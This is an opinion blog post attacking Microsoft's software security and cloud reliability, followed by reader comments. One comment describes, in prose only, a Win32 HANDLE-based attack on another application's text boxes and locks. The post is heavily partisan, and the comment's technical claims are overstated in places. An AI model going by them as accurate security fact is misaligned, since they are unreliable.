THE MONOPOLIST (poor Microsoft) loves blaming its illegally-earned market share on the desktop for security problems, but as we explained yesterday, this is a nonsensical argument and it is negligence [1, 2, 3] -- not installed base -- which makes software vulnerable. Vista 7 is not secure and even Microsoft's fanbase is willing to admit this. And in Windows, the "latest hole will soon be patched after a decade of vulnerability," says a blogger. It is not the first such example of belated patching. If Microsoft's installed base is the reason exploitable errors can be found, why has it taken a decade? The matter of fact is, less auditing of code lowers the quality of the code. Developers can get away with terrible programming practices and security is assumed to be assured by secrecy, not peer review that requires full transparency. This explains not only why Microsoft software is not secure but also why it is of such low quality (which makes the coders embarrassed to show it). As mentioned briefly in the daily links, Microsoft Fog Computing turns out to be as unreliable as its desktop-side software:
Customers on BPOS in the US and worldwide were kicked off their hosted Exchange email systems, being unable to read, write, or access their messages. All users were affected – from down in the cubicle farm all the way up to the CEO's corner office. The outages started Tuesday and came after weeks of the service slowly degrading.
Comments
Needs Sunlight
2011-05-16 07:51:36
TemporalBeing
2011-05-19 17:15:38
1. They don't have a very good patch management system, likely due to their source code management practices. The big problems result in one patch fixing an issue, and another unfixing it; this then goes round and round over years.
2. Win32 by design is insecure and cannot be fixed. The basic interface for applications with the Windows API is a system that utilizes and object called a HANDLE. Applications are suppose to use the HANDLE to do something, and then clean it up when they're done. However, there is not protection against one application getting a HANDLE for an object of another application. Furthermore, a HANDLE is merely a _pointer_ into one of several different tables (which one depends on the use of the HANDLE) inside kernel space, and by the way there is no method to authenticate the validity of a HANDLE - at least from the application layer.
What this means is that Win32 by design allows other applications to put bugs into your application. here's one very valid example:
Your application creates a text box that is suppose to only be 256 characters long. You specify this on the creation of the text box. You properly use the text box to get the 256 characters.
However, your friend BillB writes another application that accesses your text box and changes it to be 64536 bytes long, and inserts a lot of extra text into it to use up the entire space. Windows updates your text box to be the size BillB's application said it is, but its YOUR text box, not BillB's. Your application is now subject to a buffer overflow attack through no fault of your own. (Your application properly used the text box.)
That is just one attack vector - and it applies to any use of a HANDLE to do something - whether it is a text box or a lock; yes, Locks use HANDLES - so BillB's application could access one of your locks and cause your application to go into a Deadlock situation -or worse, unlock something at the wrong time. There are simply no protections and no method of protecting against those kinds of attacks - it's the design of the Win32 API.